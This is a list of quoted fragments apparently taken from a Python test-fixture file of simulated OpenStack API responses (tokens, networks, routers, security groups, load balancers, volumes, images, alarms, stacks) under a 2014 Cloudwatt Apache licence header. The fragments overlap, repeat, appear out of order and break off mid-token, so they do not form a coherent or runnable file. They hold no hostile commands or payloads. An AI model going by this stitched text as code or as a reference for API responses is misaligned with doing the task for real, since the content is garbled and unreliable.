"\"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\",",
"IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, { 'endpoints':",
"\"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\",",
"BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.",
"\"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\",",
"u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten',",
"label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] } ] } FIREWALL_POLICY_LIST = { \"firewall_policies\":",
"'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service',",
"\"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID,",
"\"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None",
"\"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"],",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\":",
"\"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [",
"[{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration",
"\"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False },",
"SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\":",
"None, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] } } ROUTER0_PORTS =",
"}, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\":",
"\"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None,",
"u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable',",
"None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\",",
"\"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS",
"\"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\":",
"\"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {},",
"\"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\",",
"\"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\":",
"None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\",",
"\"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express",
"] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\":",
"\"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\":",
"= { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False,",
"FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\":",
"\"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:b9:ef:05\", \"fixed_ips\": [",
"], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status':",
"True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\":",
"\"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"{ \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS",
"encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt # # Licensed under",
"}, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\":",
"False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\",",
"} ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports':",
"distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY",
"\"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\":",
"} ROUTER1_PORTS = { \"ports\": [ { \"status\": \"DOWN\", \"name\": \"\", \"admin_state_up\": True,",
"\"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\":",
"{u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ {",
"], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\":",
"\"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True,",
"u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST =",
"\"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\":",
"\"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\":",
"\"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\",",
"True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST = {",
"\"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True,",
"\"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\",",
"\"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] }",
"} ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"\"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\":",
"\"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\"",
"\"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\",",
"} STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten',",
"\"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\":",
"\"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None,",
"u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] }",
"\"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1],",
"}, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\": METERING_LABEL_IDS[1] }",
"'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": {",
"= 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE =",
"applicable law or agreed to in writing, software # distributed under the License",
"\"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': {",
"{ \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"[ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = { \"id\":",
"2014 Cloudwatt # # Licensed under the Apache License, Version 2.0 (the \"License\");",
"STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\":",
"] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\":",
"\"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"-*- encoding: utf-8 -*- # # Copyright © 2014 Cloudwatt # # Licensed",
"\"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\":",
"\"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1],",
"STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store'",
"\"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\":",
"{ \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, {",
"None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID",
"\"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\" } ] STACKS_LIST = { \"stacks\": [ { \"description\":",
"\"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0],",
"JSON sent from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints':",
"writing, software # distributed under the License is distributed on an \"AS IS\"",
"\"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\":",
"2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST",
"u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name':",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\":",
"\"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\":",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID },",
"{ \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\":",
"Cloudwatt # # Licensed under the Apache License, Version 2.0 (the \"License\"); you",
"{u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS =",
"'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' }",
"} ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ {",
"\"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\":",
"[ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\",",
"= [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN = {",
"\"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\":",
"PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [],",
"\"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\": \"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True,",
"{ \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\":",
"'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image' }, {",
"\"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" }",
"[ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [], \"subnet_id\":",
"\"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"{ u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'},",
"\"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\",",
"\"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4,",
"\"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\":",
"False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0,",
"PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, {",
"None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1]",
"\"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [",
"False, \"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [",
"{ \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"[], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID,",
"FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\":",
"\"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\":",
"\"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [",
"\"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\":",
"\"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\",",
"\"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False",
"[ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] }",
"\"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" },",
"] } ROUTERS_LIST = { \"routers\": [{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\":",
"}, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\":",
"}, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\":",
"\"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = {",
"\"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID,",
"\"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ {",
"'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\",",
"\"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] }",
"\"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\"",
"], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [",
"{ \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1],",
"\"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1]",
"VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT",
"\"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]],",
"[\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS = [\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"]",
"'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, {",
"\"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\",",
"True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False,",
"True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2,",
"\"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\":",
"[{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count': 22, u'size': 10, u'status':",
